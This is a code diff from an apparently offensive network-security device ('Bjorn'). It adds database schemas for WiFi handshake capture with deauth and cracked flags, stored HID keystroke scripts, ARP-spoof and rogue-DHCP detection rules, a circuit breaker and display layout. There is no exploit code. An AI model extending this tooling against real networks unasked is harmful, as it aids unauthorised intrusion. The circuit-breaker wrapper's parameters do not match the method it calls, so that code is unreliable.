f"(dropped {dropped} near-zero variance < {threshold})"
)
return sorted(selected)
def _write_feature_manifest(self, selected_features: List[str], export_filepath: str):
"""Write feature_manifest.json alongside the export file."""
try:
variances = self._get_feature_variances()
manifest = {
'created_at': datetime.now().isoformat(),
'feature_count': len(selected_features),
'min_variance_threshold': self._feature_variance_min,
'features': {
name: {'variance': round(variances.get(name, 0.0), 6)}
for name in selected_features
},
'export_file': str(export_filepath),
}
manifest_path = self.export_dir / 'feature_manifest.json'
with open(manifest_path, 'w', encoding='utf-8') as f:
json.dump(manifest, f, indent=2)
logger.info(f"Feature manifest written: {manifest_path} ({len(selected_features)} features)")
except Exception as e:
logger.error(f"Failed to write feature manifest: {e}")
# ═══════════════════════════════════════════════════════════════════════
# EXPORT FUNCTIONS
# ═══════════════════════════════════════════════════════════════════════
@@ -411,6 +487,14 @@ class DataConsolidator:
# Free the large records list immediately after export — record_ids is all we still need
del records
# AI-01: Write feature manifest with variance-filtered feature names
try:
selected = self._get_selected_features()
if selected:
self._write_feature_manifest(selected, str(filepath))
except Exception as e:
logger.error(f"Feature manifest generation failed: {e}")
# Create export batch record
batch_id = self._create_export_batch(filepath, count)

View File

@@ -26,6 +26,9 @@ from db_utils.comments import CommentOps
from db_utils.agents import AgentOps
from db_utils.studio import StudioOps
from db_utils.webenum import WebEnumOps
from db_utils.sentinel import SentinelOps
from db_utils.bifrost import BifrostOps
from db_utils.loki import LokiOps
logger = Logger(name="database.py", level=logging.DEBUG)
@@ -61,6 +64,9 @@ class BjornDatabase:
self._agents = AgentOps(self._base)
self._studio = StudioOps(self._base)
self._webenum = WebEnumOps(self._base)
self._sentinel = SentinelOps(self._base)
self._bifrost = BifrostOps(self._base)
self._loki = LokiOps(self._base)
# Ensure schema is created
self.ensure_schema()
@@ -138,6 +144,9 @@ class BjornDatabase:
self._agents.create_tables()
self._studio.create_tables()
self._webenum.create_tables()
self._sentinel.create_tables()
self._bifrost.create_tables()
self._loki.create_tables()
# Initialize stats singleton
self._stats.ensure_stats_initialized()
@@ -269,6 +278,26 @@ class BjornDatabase:
def get_last_action_statuses_for_mac(self, mac_address: str) -> Dict[str, Dict[str, str]]:
return self._queue.get_last_action_statuses_for_mac(mac_address)
# Circuit breaker operations
def record_circuit_breaker_failure(self, action_name: str, mac: str = '',
max_failures: int = 5, cooldown_s: int = 300) -> None:
return self._queue.record_circuit_breaker_failure(action_name, mac, max_failures, cooldown_s)
def record_circuit_breaker_success(self, action_name: str, mac: str = '') -> None:
return self._queue.record_circuit_breaker_success(action_name, mac)
def is_circuit_open(self, action_name: str, mac: str = '') -> bool:
return self._queue.is_circuit_open(action_name, mac)
def get_circuit_breaker_status(self, action_name: str, mac: str = '') -> Optional[Dict[str, Any]]:
return self._queue.get_circuit_breaker_status(action_name, mac)
def reset_circuit_breaker(self, action_name: str, mac: str = '') -> None:
return self._queue.reset_circuit_breaker(action_name, mac)
def count_running_actions(self, action_name: Optional[str] = None) -> int:
return self._queue.count_running_actions(action_name)
# Vulnerability operations
def add_vulnerability(self, mac_address: str, vuln_id: str, ip: Optional[str] = None,
hostname: Optional[str] = None, port: Optional[int] = None):

116
db_utils/bifrost.py Normal file
View File

@@ -0,0 +1,116 @@
"""
Bifrost DB operations — networks, handshakes, epochs, activity, peers, plugin data.
"""
import logging
from logger import Logger
logger = Logger(name="db_utils.bifrost", level=logging.DEBUG)
class BifrostOps:
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create all Bifrost tables."""
# WiFi networks discovered by Bifrost
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_networks (
bssid TEXT PRIMARY KEY,
essid TEXT DEFAULT '',
channel INTEGER DEFAULT 0,
encryption TEXT DEFAULT '',
rssi INTEGER DEFAULT 0,
vendor TEXT DEFAULT '',
num_clients INTEGER DEFAULT 0,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
handshake INTEGER DEFAULT 0,
deauthed INTEGER DEFAULT 0,
associated INTEGER DEFAULT 0,
whitelisted INTEGER DEFAULT 0
)
""")
# Captured handshakes
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_handshakes (
id INTEGER PRIMARY KEY AUTOINCREMENT,
ap_mac TEXT NOT NULL,
sta_mac TEXT NOT NULL,
ap_essid TEXT DEFAULT '',
channel INTEGER DEFAULT 0,
rssi INTEGER DEFAULT 0,
filename TEXT DEFAULT '',
captured_at TEXT DEFAULT CURRENT_TIMESTAMP,
uploaded INTEGER DEFAULT 0,
cracked INTEGER DEFAULT 0,
UNIQUE(ap_mac, sta_mac)
)
""")
# Epoch history
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_epochs (
id INTEGER PRIMARY KEY AUTOINCREMENT,
epoch_num INTEGER NOT NULL,
started_at TEXT NOT NULL,
duration_secs REAL DEFAULT 0,
num_deauths INTEGER DEFAULT 0,
num_assocs INTEGER DEFAULT 0,
num_handshakes INTEGER DEFAULT 0,
num_hops INTEGER DEFAULT 0,
num_missed INTEGER DEFAULT 0,
num_peers INTEGER DEFAULT 0,
mood TEXT DEFAULT 'ready',
reward REAL DEFAULT 0,
cpu_load REAL DEFAULT 0,
mem_usage REAL DEFAULT 0,
temperature REAL DEFAULT 0,
meta_json TEXT DEFAULT '{}'
)
""")
# Activity log (event feed)
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_activity (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
event_type TEXT NOT NULL,
title TEXT NOT NULL,
details TEXT DEFAULT '',
meta_json TEXT DEFAULT '{}'
)
""")
self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_bifrost_activity_ts "
"ON bifrost_activity(timestamp DESC)"
)
# Peers (mesh networking — Phase 2)
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_peers (
peer_id TEXT PRIMARY KEY,
name TEXT DEFAULT '',
version TEXT DEFAULT '',
face TEXT DEFAULT '',
encounters INTEGER DEFAULT 0,
last_channel INTEGER DEFAULT 0,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
# Plugin persistent state
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_plugin_data (
plugin_name TEXT NOT NULL,
key TEXT NOT NULL,
value TEXT DEFAULT '',
PRIMARY KEY (plugin_name, key)
)
""")
logger.debug("Bifrost tables created/verified")

51
db_utils/loki.py Normal file
View File

@@ -0,0 +1,51 @@
"""
Loki DB operations — HID scripts and job tracking.
"""
import logging
from logger import Logger
logger = Logger(name="db_utils.loki", level=logging.DEBUG)
class LokiOps:
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create all Loki tables."""
# User-saved HID scripts
self.base.execute("""
CREATE TABLE IF NOT EXISTS loki_scripts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL UNIQUE,
description TEXT DEFAULT '',
content TEXT NOT NULL DEFAULT '',
category TEXT DEFAULT 'general',
target_os TEXT DEFAULT 'any',
created_at TEXT DEFAULT CURRENT_TIMESTAMP,
updated_at TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
# Job execution history
self.base.execute("""
CREATE TABLE IF NOT EXISTS loki_jobs (
id TEXT PRIMARY KEY,
script_id INTEGER,
script_name TEXT DEFAULT '',
status TEXT DEFAULT 'pending',
output TEXT DEFAULT '',
error TEXT DEFAULT '',
started_at TEXT,
finished_at TEXT,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_loki_jobs_status "
"ON loki_jobs(status)"
)
logger.debug("Loki tables created/verified")

View File

@@ -65,6 +65,20 @@ class QueueOps:
WHERE status='scheduled';
""")
# Circuit breaker table for ORCH-01
self.base.execute("""
CREATE TABLE IF NOT EXISTS action_circuit_breaker (
action_name TEXT NOT NULL,
mac_address TEXT NOT NULL DEFAULT '',
failure_streak INTEGER NOT NULL DEFAULT 0,
last_failure_at TEXT,
circuit_status TEXT NOT NULL DEFAULT 'closed',
opened_at TEXT,
cooldown_until TEXT,
PRIMARY KEY (action_name, mac_address)
);
""")
logger.debug("Action queue table created/verified")
# =========================================================================
@@ -398,6 +412,120 @@ class QueueOps:
# HELPER METHODS
# =========================================================================
# =========================================================================
# CIRCUIT BREAKER OPERATIONS (ORCH-01)
# =========================================================================
def record_circuit_breaker_failure(self, action_name: str, mac: str = '',
threshold: int = 3) -> None:
"""Increment failure streak; open circuit if streak >= threshold."""
now_str = self.base.query_one("SELECT datetime('now') AS ts")['ts']
# Upsert the row
self.base.execute("""
INSERT INTO action_circuit_breaker (action_name, mac_address, failure_streak,
last_failure_at, circuit_status)
VALUES (?, ?, 1, ?, 'closed')
ON CONFLICT(action_name, mac_address) DO UPDATE SET
failure_streak = failure_streak + 1,
last_failure_at = excluded.last_failure_at
""", (action_name, mac or '', now_str))
# Check if we need to open the circuit
row = self.base.query_one(
"SELECT failure_streak FROM action_circuit_breaker WHERE action_name=? AND mac_address=?",
(action_name, mac or '')
)
if row and row['failure_streak'] >= threshold:
streak = row['failure_streak']
cooldown_secs = min(2 ** streak * 60, 3600)
self.base.execute("""
UPDATE action_circuit_breaker
SET circuit_status = 'open',
opened_at = ?,
cooldown_until = datetime(?, '+' || ? || ' seconds')
WHERE action_name=? AND mac_address=?
""", (now_str, now_str, str(cooldown_secs), action_name, mac or ''))
def record_circuit_breaker_success(self, action_name: str, mac: str = '') -> None:
"""Reset failure streak and close circuit on success."""
self.base.execute("""
INSERT INTO action_circuit_breaker (action_name, mac_address, failure_streak,
circuit_status)
VALUES (?, ?, 0, 'closed')
ON CONFLICT(action_name, mac_address) DO UPDATE SET
failure_streak = 0,
circuit_status = 'closed',
opened_at = NULL,
cooldown_until = NULL
""", (action_name, mac or ''))
def is_circuit_open(self, action_name: str, mac: str = '') -> bool:
"""Return True if circuit is open AND cooldown hasn't expired.
If cooldown has expired, transition to half_open and return False."""
row = self.base.query_one(
"SELECT circuit_status, cooldown_until FROM action_circuit_breaker "
"WHERE action_name=? AND mac_address=?",
(action_name, mac or '')
)
if not row:
return False
status = row['circuit_status']
if status == 'closed':
return False
if status == 'open':
cooldown = row.get('cooldown_until')
if cooldown:
# Check if cooldown has expired
expired = self.base.query_one(
"SELECT datetime('now') >= datetime(?) AS expired",
(cooldown,)
)
if expired and expired['expired']:
# Transition to half_open
self.base.execute("""
UPDATE action_circuit_breaker SET circuit_status='half_open'
WHERE action_name=? AND mac_address=?
""", (action_name, mac or ''))
return False # Allow one attempt through
return True # Still in cooldown
# half_open: allow one attempt through
return False
def get_circuit_breaker_status(self, action_name: str, mac: str = '') -> Optional[Dict[str, Any]]:
"""Return full circuit breaker status dict."""
row = self.base.query_one(
"SELECT * FROM action_circuit_breaker WHERE action_name=? AND mac_address=?",
(action_name, mac or '')
)
return dict(row) if row else None
def reset_circuit_breaker(self, action_name: str, mac: str = '') -> None:
"""Manual reset of circuit breaker."""
self.base.execute("""
DELETE FROM action_circuit_breaker WHERE action_name=? AND mac_address=?
""", (action_name, mac or ''))
# =========================================================================
# CONCURRENCY OPERATIONS (ORCH-02)
# =========================================================================
def count_running_actions(self, action_name: Optional[str] = None) -> int:
"""Count currently running actions, optionally filtered by action_name."""
if action_name:
row = self.base.query_one(
"SELECT COUNT(*) AS cnt FROM action_queue WHERE status='running' AND action_name=?",
(action_name,)
)
else:
row = self.base.query_one(
"SELECT COUNT(*) AS cnt FROM action_queue WHERE status='running'"
)
return int(row['cnt']) if row else 0
# =========================================================================
# HELPER METHODS
# =========================================================================
def _format_ts_for_raw(self, ts_db: Optional[str]) -> str:
"""
Convert SQLite 'YYYY-MM-DD HH:MM:SS' to 'YYYYMMDD_HHMMSS'.

314
db_utils/sentinel.py Normal file
View File

@@ -0,0 +1,314 @@
"""
Sentinel DB operations — events, rules, known devices baseline.
"""
import json
import logging
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="db_utils.sentinel", level=logging.DEBUG)
class SentinelOps:
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create all Sentinel tables."""
# Known device baselines — MAC → expected behavior
self.base.execute("""
CREATE TABLE IF NOT EXISTS sentinel_devices (
mac_address TEXT PRIMARY KEY,
alias TEXT,
trusted INTEGER DEFAULT 0,
watch INTEGER DEFAULT 1,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
expected_ips TEXT DEFAULT '',
expected_ports TEXT DEFAULT '',
notes TEXT DEFAULT ''
)
""")
# Events / alerts log
self.base.execute("""
CREATE TABLE IF NOT EXISTS sentinel_events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT DEFAULT CURRENT_TIMESTAMP,
event_type TEXT NOT NULL,
severity TEXT DEFAULT 'info',
title TEXT NOT NULL,
details TEXT DEFAULT '',
mac_address TEXT,
ip_address TEXT,
acknowledged INTEGER DEFAULT 0,
notified INTEGER DEFAULT 0,
meta_json TEXT DEFAULT '{}'
)
""")
self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_sentinel_events_ts "
"ON sentinel_events(timestamp DESC)"
)
self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_sentinel_events_type "
"ON sentinel_events(event_type)"
)
self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_sentinel_events_ack "
"ON sentinel_events(acknowledged)"
)
# Configurable rules (AND/OR composable)
self.base.execute("""
CREATE TABLE IF NOT EXISTS sentinel_rules (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL,
enabled INTEGER DEFAULT 1,
trigger_type TEXT NOT NULL,
conditions TEXT DEFAULT '{}',
logic TEXT DEFAULT 'AND',
actions TEXT DEFAULT '["notify_web"]',
cooldown_s INTEGER DEFAULT 60,
last_fired TEXT,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
)
""")
# ARP cache snapshots for spoof detection
self.base.execute("""
CREATE TABLE IF NOT EXISTS sentinel_arp_cache (
mac_address TEXT NOT NULL,
ip_address TEXT NOT NULL,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (mac_address, ip_address)
)
""")
# Insert default rules if empty
existing = self.base.query("SELECT COUNT(*) AS c FROM sentinel_rules")
if existing and existing[0].get('c', 0) == 0:
self._insert_default_rules()
def _insert_default_rules(self):
"""Seed default Sentinel rules."""
defaults = [
{
"name": "New Device Detected",
"trigger_type": "new_device",
"conditions": "{}",
"logic": "AND",
"actions": '["notify_web"]',
"cooldown_s": 0,
},
{
"name": "Device Joined Network",
"trigger_type": "device_join",
"conditions": "{}",
"logic": "AND",
"actions": '["notify_web"]',
"cooldown_s": 30,
},
{
"name": "Device Left Network",
"trigger_type": "device_leave",
"conditions": "{}",
"logic": "AND",
"actions": '["notify_web"]',
"cooldown_s": 30,
},
{
"name": "ARP Spoofing Detected",
"trigger_type": "arp_spoof",
"conditions": "{}",
"logic": "AND",
"actions": '["notify_web", "notify_discord"]',
"cooldown_s": 10,
},
{
"name": "Port Change on Host",
"trigger_type": "port_change",
"conditions": "{}",
"logic": "AND",
"actions": '["notify_web"]',
"cooldown_s": 120,
},
{
"name": "Rogue DHCP Server",
"trigger_type": "rogue_dhcp",
"conditions": "{}",
"logic": "AND",
"actions": '["notify_web", "notify_discord"]',
"cooldown_s": 60,
},
]
for rule in defaults:
self.base.execute(
"""INSERT INTO sentinel_rules
(name, trigger_type, conditions, logic, actions, cooldown_s)
VALUES (?, ?, ?, ?, ?, ?)""",
(rule["name"], rule["trigger_type"], rule["conditions"],
rule["logic"], rule["actions"], rule["cooldown_s"])
)
# ── Events ──────────────────────────────────────────────────────────
def insert_event(self, event_type: str, severity: str, title: str,
details: str = "", mac: str = "", ip: str = "",
meta: Optional[Dict] = None) -> int:
return self.base.execute(
"""INSERT INTO sentinel_events
(event_type, severity, title, details, mac_address, ip_address, meta_json)
VALUES (?, ?, ?, ?, ?, ?, ?)""",
(event_type, severity, title, details, mac, ip,
json.dumps(meta or {}))
)
def get_events(self, limit: int = 100, offset: int = 0,
event_type: str = "", unread_only: bool = False) -> List[Dict]:
sql = "SELECT * FROM sentinel_events WHERE 1=1"
params: list = []
if event_type:
sql += " AND event_type = ?"
params.append(event_type)
if unread_only:
sql += " AND acknowledged = 0"
sql += " ORDER BY timestamp DESC LIMIT ? OFFSET ?"
params.extend([limit, offset])
return self.base.query(sql, params)
def count_unread(self) -> int:
row = self.base.query_one(
"SELECT COUNT(*) AS c FROM sentinel_events WHERE acknowledged = 0"
)
return int(row.get("c", 0)) if row else 0
def acknowledge_event(self, event_id: int):
self.base.execute(
"UPDATE sentinel_events SET acknowledged = 1 WHERE id = ?",
(event_id,)
)
def acknowledge_all(self):
self.base.execute("UPDATE sentinel_events SET acknowledged = 1")
def clear_events(self):
self.base.execute("DELETE FROM sentinel_events")
# ── Rules ───────────────────────────────────────────────────────────
def get_rules(self) -> List[Dict]:
return self.base.query("SELECT * FROM sentinel_rules ORDER BY id")
def get_enabled_rules(self, trigger_type: str = "") -> List[Dict]:
if trigger_type:
return self.base.query(
"SELECT * FROM sentinel_rules WHERE enabled = 1 AND trigger_type = ?",
(trigger_type,)
)
return self.base.query(
"SELECT * FROM sentinel_rules WHERE enabled = 1"
)
def upsert_rule(self, data: Dict) -> Dict:
rule_id = data.get("id")
if rule_id:
self.base.execute(
"""UPDATE sentinel_rules SET
name=?, enabled=?, trigger_type=?, conditions=?,
logic=?, actions=?, cooldown_s=?
WHERE id=?""",
(data["name"], int(data.get("enabled", 1)),
data["trigger_type"], json.dumps(data.get("conditions", {})),
data.get("logic", "AND"),
json.dumps(data.get("actions", ["notify_web"])),
int(data.get("cooldown_s", 60)), rule_id)
)
else:
self.base.execute(
"""INSERT INTO sentinel_rules
(name, enabled, trigger_type, conditions, logic, actions, cooldown_s)
VALUES (?, ?, ?, ?, ?, ?, ?)""",
(data["name"], int(data.get("enabled", 1)),
data["trigger_type"], json.dumps(data.get("conditions", {})),
data.get("logic", "AND"),
json.dumps(data.get("actions", ["notify_web"])),
int(data.get("cooldown_s", 60)))
)
return {"status": "ok"}
def delete_rule(self, rule_id: int):
self.base.execute("DELETE FROM sentinel_rules WHERE id = ?", (rule_id,))
def update_rule_fired(self, rule_id: int):
self.base.execute(
"UPDATE sentinel_rules SET last_fired = CURRENT_TIMESTAMP WHERE id = ?",
(rule_id,)
)
# ── Devices baseline ────────────────────────────────────────────────
def get_known_device(self, mac: str) -> Optional[Dict]:
return self.base.query_one(
"SELECT * FROM sentinel_devices WHERE mac_address = ?", (mac,)
)
def upsert_device(self, mac: str, **kwargs):
existing = self.get_known_device(mac)
if existing:
sets = []
params = []
for k, v in kwargs.items():
if k in ("alias", "trusted", "watch", "expected_ips",
"expected_ports", "notes"):
sets.append(f"{k} = ?")
params.append(v)
sets.append("last_seen = CURRENT_TIMESTAMP")
if sets:
params.append(mac)
self.base.execute(
f"UPDATE sentinel_devices SET {', '.join(sets)} WHERE mac_address = ?",
params
)
else:
self.base.execute(
"""INSERT INTO sentinel_devices
(mac_address, alias, trusted, watch, expected_ips, expected_ports, notes)
VALUES (?, ?, ?, ?, ?, ?, ?)""",
(mac, kwargs.get("alias", ""),
int(kwargs.get("trusted", 0)),
int(kwargs.get("watch", 1)),
kwargs.get("expected_ips", ""),
kwargs.get("expected_ports", ""),
kwargs.get("notes", ""))
)
def get_all_known_devices(self) -> List[Dict]:
return self.base.query("SELECT * FROM sentinel_devices ORDER BY last_seen DESC")
# ── ARP cache ───────────────────────────────────────────────────────
def update_arp_entry(self, mac: str, ip: str):
self.base.execute(
"""INSERT INTO sentinel_arp_cache (mac_address, ip_address)
VALUES (?, ?)
ON CONFLICT(mac_address, ip_address)
DO UPDATE SET last_seen = CURRENT_TIMESTAMP""",
(mac, ip)
)
def get_arp_for_ip(self, ip: str) -> List[Dict]:
return self.base.query(
"SELECT * FROM sentinel_arp_cache WHERE ip_address = ?", (ip,)
)
def get_arp_for_mac(self, mac: str) -> List[Dict]:
return self.base.query(
"SELECT * FROM sentinel_arp_cache WHERE mac_address = ?", (mac,)
)
def get_full_arp_cache(self) -> List[Dict]:
return self.base.query("SELECT * FROM sentinel_arp_cache ORDER BY last_seen DESC")

35
debug_schema.py Normal file
View File

@@ -0,0 +1,35 @@
import sqlite3
import os
db_path = "bjorn.db"
def check_schema():
if not os.path.exists(db_path):
print(f"Database {db_path} not found.")
return
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
tables = ["rl_training_log", "rl_experiences"]
with open("schema_debug.txt", "w") as f:
for table in tables:
f.write(f"\nSchema for {table}:\n")
try:
cursor.execute(f"PRAGMA table_info({table})")
columns = cursor.fetchall()
if not columns:
f.write(" (Table not found)\n")
else:
for col in columns:
f.write(f" - {col[1]} ({col[2]})\n")
except Exception as e:
f.write(f" Error: {e}\n")
conn.close()
if __name__ == "__main__":
check_schema()
print("Done writing to schema_debug.txt")

View File

@@ -15,6 +15,7 @@ from typing import Dict, List, Optional, Any, Tuple
from PIL import Image, ImageDraw, ImageFont
from init_shared import shared_data
from logger import Logger
from display_layout import DisplayLayout
logger = Logger(name="display.py", level=logging.DEBUG)
@@ -166,6 +167,10 @@ class Display:
self.config = self.shared_data.config
self.epd_enabled = self.config.get("epd_enabled", True)
# Initialize display layout engine
self.layout = DisplayLayout(self.shared_data)
self.shared_data.display_layout = self.layout
self.epd = self.shared_data.epd if self.epd_enabled else None
if self.config.get("epd_type") == "epd2in13_V2":
@@ -304,7 +309,8 @@ class Display:
image = Image.new('1', (self.shared_data.width, self.shared_data.height), 255)
draw = ImageDraw.Draw(image)
draw.text((self.px(37), self.py(5)), "BJORN", font=self.shared_data.font_viking, fill=0)
title_pos = self.layout.get('title')
draw.text((self.px(title_pos.get('x', 37)), self.py(title_pos.get('y', 5))), "BJORN", font=self.shared_data.font_viking, fill=0)
message = f"Awakening...\nIP: {ip_address}"
draw.text(
@@ -349,14 +355,25 @@ class Display:
return default
def get_frise_position(self) -> Tuple[int, int]:
display_type = self.config.get("epd_type", "default")
if display_type == "epd2in7":
x = self._as_int(getattr(self.shared_data, "frise_epd2in7_x", 50), 50)
y = self._as_int(getattr(self.shared_data, "frise_epd2in7_y", 160), 160)
frise = self.layout.get('frise')
if frise:
# Layout-driven frise position; shared_data overrides still honoured
display_type = self.config.get("epd_type", "default")
if display_type == "epd2in7":
x = self._as_int(getattr(self.shared_data, "frise_epd2in7_x", frise.get('x', 50)), frise.get('x', 50))
y = self._as_int(getattr(self.shared_data, "frise_epd2in7_y", frise.get('y', 160)), frise.get('y', 160))
else:
x = self._as_int(getattr(self.shared_data, "frise_default_x", frise.get('x', 0)), frise.get('x', 0))
y = self._as_int(getattr(self.shared_data, "frise_default_y", frise.get('y', 160)), frise.get('y', 160))
else:
x = self._as_int(getattr(self.shared_data, "frise_default_x", 0), 0)
y = self._as_int(getattr(self.shared_data, "frise_default_y", 160), 160)
# Fallback to original hardcoded logic
display_type = self.config.get("epd_type", "default")
if display_type == "epd2in7":
x = self._as_int(getattr(self.shared_data, "frise_epd2in7_x", 50), 50)
y = self._as_int(getattr(self.shared_data, "frise_epd2in7_y", 160), 160)
else:
x = self._as_int(getattr(self.shared_data, "frise_default_x", 0), 0)
y = self._as_int(getattr(self.shared_data, "frise_default_y", 160), 160)
return self.px(x), self.py(y)
@@ -609,16 +626,18 @@ class Display:
try:
draw = ImageDraw.Draw(image)
draw.text((self.px(37), self.py(5)), self.bjorn_name, font=self.font_to_use, fill=0)
title_pos = self.layout.get('title')
draw.text((self.px(title_pos.get('x', 37)), self.py(title_pos.get('y', 5))), self.bjorn_name, font=self.font_to_use, fill=0)
self._draw_connection_icons(image)
self._draw_battery_status(image)
self._draw_statistics(image, draw)
self._draw_system_histogram(image, draw)
status_pos = self.layout.get('status_image')
status_img = self.shared_data.bjorn_status_image or self.shared_data.attack
if status_img is not None:
image.paste(status_img, (self.px(3), self.py(52)))
image.paste(status_img, (self.px(status_pos.get('x', 3)), self.py(status_pos.get('y', 52))))
self._draw_status_text(draw)
self._draw_decorations(image, draw)
@@ -635,12 +654,13 @@ class Display:
raise
def _draw_connection_icons(self, image: Image.Image):
wifi_pos = self.layout.get('wifi_icon')
wifi_width = self.px(16)
bluetooth_width = self.px(9)
usb_width = self.px(9)
ethernet_width = self.px(12)
start_x = self.px(3)
start_x = self.px(wifi_pos.get('x', 3))
spacing = self.px(6)
active_icons = []
@@ -663,7 +683,8 @@ class Display:
current_x += width + spacing
def _draw_battery_status(self, image: Image.Image):
battery_pos = (self.px(110), self.py(3))
bat = self.layout.get('battery_icon')
battery_pos = (self.px(bat.get('x', 110)), self.py(bat.get('y', 3)))
battery_status = self.shared_data.battery_status
if battery_status == 101:
@@ -683,47 +704,41 @@ class Display:
break
def _draw_system_histogram(self, image: Image.Image, draw: ImageDraw.Draw):
# Vertical bars at the bottom-left
# Screen W: 122, Character W: 78 -> Character X: 22
# Available Left: 0-21.
# Margins: Left 2px (0,1), Right 1px (21)
# RAM: x=2-10 (9px)
# Gap: 11 (1px)
# CPU: x=12-20 (9px)
# Vertical bars at the bottom-left — positions from layout
mem_hist = self.layout.get('mem_histogram')
cpu_hist = self.layout.get('cpu_histogram')
# Bottom of screen is 249. User requested 1px up -> 248.
# Font 9 height approx 9-10px.
# Label now has NO box and 1px gap.
# Label Y: 248 - 9 (height) = 239.
# Gap: 1px -> 238 empty.
# Bar Base Y: 237.
# Memory bar: x from layout, width from layout
mem_x = mem_hist.get('x', 2)
mem_w = mem_hist.get('w', 8)
mem_bar_y = mem_hist.get('y', 204)
mem_bar_h = mem_hist.get('h', 33)
# CPU bar: x from layout
cpu_x = cpu_hist.get('x', 12)
cpu_w = cpu_hist.get('w', 8)
label_h = self.py(9) # Approx height for font 9
label_y = self.py(239)
base_y = self.py(237) # 1px gap above label
max_h = self.py(33) # Remaining height (237 - 204 = 33)
max_h = self.py(mem_bar_h)
# RAM
ram_pct = max(0, min(100, self.shared_data.system_mem))
ram_h = int((ram_pct / 100.0) * max_h)
# Bar background (x=2 to x=10 inclusive)
draw.rectangle([self.px(2), base_y - max_h, self.px(10), base_y], outline=0)
# Fill
draw.rectangle([self.px(2), base_y - ram_h, self.px(10), base_y], fill=0)
draw.rectangle([self.px(mem_x), base_y - max_h, self.px(mem_x + mem_w), base_y], outline=0)
draw.rectangle([self.px(mem_x), base_y - ram_h, self.px(mem_x + mem_w), base_y], fill=0)
# Label 'M' - No Box, just text
draw.text((self.px(3), label_y), "M", font=self.shared_data.font_arial9, fill=0)
draw.text((self.px(mem_x + 1), label_y), "M", font=self.shared_data.font_arial9, fill=0)
# CPU
cpu_pct = max(0, min(100, self.shared_data.system_cpu))
cpu_h = int((cpu_pct / 100.0) * max_h)
# Bar background (x=12 to x=20 inclusive)
draw.rectangle([self.px(12), base_y - max_h, self.px(20), base_y], outline=0)
# Fill
draw.rectangle([self.px(12), base_y - cpu_h, self.px(20), base_y], fill=0)
draw.rectangle([self.px(cpu_x), base_y - max_h, self.px(cpu_x + cpu_w), base_y], outline=0)
draw.rectangle([self.px(cpu_x), base_y - cpu_h, self.px(cpu_x + cpu_w), base_y], fill=0)
# Label 'C' - No Box
draw.text((self.px(13), label_y), "C", font=self.shared_data.font_arial9, fill=0)
draw.text((self.px(cpu_x + 1), label_y), "C", font=self.shared_data.font_arial9, fill=0)
def _format_count(self, val):
try:
@@ -735,26 +750,32 @@ class Display:
return str(val)
def _draw_statistics(self, image: Image.Image, draw: ImageDraw.Draw):
stats_y = self.layout.get('stats_row', 'y') if isinstance(self.layout.get('stats_row'), dict) else 22
if isinstance(stats_y, dict):
stats_y = stats_y.get('y', 22)
stats_row = self.layout.get('stats_row')
sr_y = stats_row.get('y', 22) if stats_row else 22
sr_text_y = sr_y + 17 # Text offset below icon row
stats = [
# Row 1 (Icons at y=22, Text at y=39)
# Row 1 (Icons at stats_row y, Text at y+17)
# Target
(self.shared_data.target, (self.px(2), self.py(22)),
(self.px(2), self.py(39)), self._format_count(self.shared_data.target_count)),
(self.shared_data.target, (self.px(2), self.py(sr_y)),
(self.px(2), self.py(sr_text_y)), self._format_count(self.shared_data.target_count)),
# Port
(self.shared_data.port, (self.px(22), self.py(22)),
(self.px(22), self.py(39)), self._format_count(self.shared_data.port_count)),
(self.shared_data.port, (self.px(22), self.py(sr_y)),
(self.px(22), self.py(sr_text_y)), self._format_count(self.shared_data.port_count)),
# Vuln
(self.shared_data.vuln, (self.px(42), self.py(22)),
(self.px(42), self.py(39)), self._format_count(self.shared_data.vuln_count)),
(self.shared_data.vuln, (self.px(42), self.py(sr_y)),
(self.px(42), self.py(sr_text_y)), self._format_count(self.shared_data.vuln_count)),
# Cred
(self.shared_data.cred, (self.px(62), self.py(22)),
(self.px(62), self.py(39)), self._format_count(self.shared_data.cred_count)),
(self.shared_data.cred, (self.px(62), self.py(sr_y)),
(self.px(62), self.py(sr_text_y)), self._format_count(self.shared_data.cred_count)),
# Zombie
(self.shared_data.zombie, (self.px(82), self.py(22)),
(self.px(82), self.py(39)), self._format_count(self.shared_data.zombie_count)),
(self.shared_data.zombie, (self.px(82), self.py(sr_y)),
(self.px(82), self.py(sr_text_y)), self._format_count(self.shared_data.zombie_count)),
# Data
(self.shared_data.data, (self.px(102), self.py(22)),
(self.px(102), self.py(39)), self._format_count(self.shared_data.data_count)),
(self.shared_data.data, (self.px(102), self.py(sr_y)),
(self.px(102), self.py(sr_text_y)), self._format_count(self.shared_data.data_count)),
# LVL Widget (Top-Left of bottom frame)
